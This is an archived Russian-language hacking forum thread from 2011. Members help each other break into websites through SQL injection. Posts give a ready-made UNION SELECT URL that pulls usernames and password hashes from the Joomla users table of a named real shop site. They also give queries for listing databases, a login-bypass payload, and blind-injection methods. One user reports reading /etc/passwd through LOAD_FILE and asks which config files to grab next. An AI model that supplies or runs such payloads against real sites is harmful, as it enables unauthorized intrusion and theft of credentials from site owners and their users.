HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16181  
Старый 20.01.2011, 20:01
xarko_v
Guest
Сообщений: n/a
Провел на форуме:
3318

Репутация: 0
По умолчанию

Skipp ,

http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+imya bd.jos_users+limit+0,1--+
 
Ответить с цитированием

  #16182  
Старый 20.01.2011, 22:12
Skipp
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215

Репутация: 0
По умолчанию

xarko_v По твоему способу тоже не выводит.

Я уже пробовал по разному:

Цитата:
Сообщение от None  
http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+bestshop_belklimat (здесь все базы пробовал подставлять)+where+table_name=jos_users (также имя таблицы подставлял в HEX)+limit+0,1--+
Цитата:
Сообщение от Gorev  
Gorev said:
я не буду говорить как, дам наводку, там 3 базы..
belklimat
bestshop_bestshop
bestshop_plenki
чуешь?
Команда database() говорит что я работаю с БД bestshop_belklimat. Пробовал подставлять все базы по очереди и в запрос от xarko_v и в свой выше указанный. Что ещё посоветуете?
 
Ответить с цитированием

  #16183  
Старый 20.01.2011, 22:16
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Skipp  
Skipp said:
xarko_v
По твоему способу тоже не выводит.
Я уже пробовал по разному:
Команда database() говорит что я работаю с БД bestshop_belklimat. Пробовал подставлять все базы по очереди и в запрос от
xarko_v
и в свой выше указанный. Что ещё посоветуете?
да там уже шеллов как граблей наверное на твоем сайте...пасс сбрутили уже давно
 
Ответить с цитированием

  #16184  
Старый 20.01.2011, 22:17
Napas
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871

Репутация: 16
По умолчанию

http://www.belklimat.by/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,concat%28username,0x3a,password%29,1 0,11,12,13,14,15,%2016,17,18,19,20+from+bestshop_b estshop.jos_users+limit+0,1--+

вот готовый запрос для хэша и логина

чтоб в следующий раз такие вопросы не задавать, хоть примерно пойми синтаксис запросов и статьи повнимательней почитай
 
Ответить с цитированием

  #16185  
Старый 20.01.2011, 22:35
Skipp
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215

Репутация: 0
По умолчанию

Спасибо, приму во внимание.
 
Ответить с цитированием

  #16186  
Старый 20.01.2011, 23:09
Skipp
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215

Репутация: 0
По умолчанию

А как можно узнать количество и имена БД?
 
Ответить с цитированием

  #16187  
Старый 20.01.2011, 23:23
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Skipp  
Skipp said:
А как можно узнать количество и имена БД?
а когда вы начнете читать? =\

group_concat(schema_name) from information_schema.schemata

кол.во - count(schema_name) from information_schema.schemata
 
Ответить с цитированием

  #16188  
Старый 21.01.2011, 10:39
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

нашел на одном сайте при вводе логина и пасса ставлю кавычку (') пишет:

Не удалось выполнить запрос!

подскажите какие еще запросы есть наподобие (' or 1=1)
 
Ответить с цитированием

  #16189  
Старый 21.01.2011, 18:45
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619

Репутация: 10
По умолчанию

Цитата:
Сообщение от noviyuser  
noviyuser said:
нашел на одном сайте при вводе логина и пасса ставлю кавычку (') пишет:
Не удалось выполнить запрос!
подскажите какие еще запросы есть наподобие (' or 1=1)
Рекомендую читать мануалы по иньекциям(см. раздел Статьи), хотя имхо иньекция в авторизации сейчас большая редкость. Если коротко в данном случае я бы рекомендовал использовать что-то типа Admin'+--+ где Admin - логин администратора а комментарий -- отсекает проверку пароля. Возможно после кавычки надо будет добавить закрывающую скобку, возможно не одну. И если кавычка реально работает то вместо комментария -- скорее всего можно использовать /* если речь идет о mysql.

Теперь мой вопрос:

Столкнулся со слепой иньекцией типа union+select+555+--+, ошибка не выводится, но выводится название товара с id=555. Товаров достаточно много, так что теоретически существует возможность создать словарик соответствий выводимого названия товара и инжектируемого айди. После чего уже быстро получать значение нужной переменной, ибо на один символ будет приходиться один запрос.

Вопрос в том, существуют ли уже какие-то тулзы для автоматизации этого процесса и если нету, то есть ли в такой тулзе необходимость ибо руки не из жопу растут, могу и написать.

В принципе согласен можно и не заморачиваться и стандартными методами blind раскручивать, но это не интересно и кроме в моем случае кое-какие символы фильтруются и проги эту иньекцию не кушают.
 
Ответить с цитированием

  #16190  
Старый 21.01.2011, 22:36
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

загрузил файл /etc/passwd через sql injection

(и дальше наподобие)

#loginass:1002:65533::0:0::/var/www/xxx.xxx.com:/usr/local/bin/bash

#login1ass1:1000:1000::0:0:user1:/home/alx:/sbin/nologin

получается login и pass от домена xxx.xxx.com/admin ?

blabla:*:1001:65533:ftp-access to xxx.xxx.net:/var/www/xxx.xxx.net/docs:/sbin/nologin

а это что значит? какие еще значения можно загрузить через load file() имею ввиду конфигурационные файлы
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ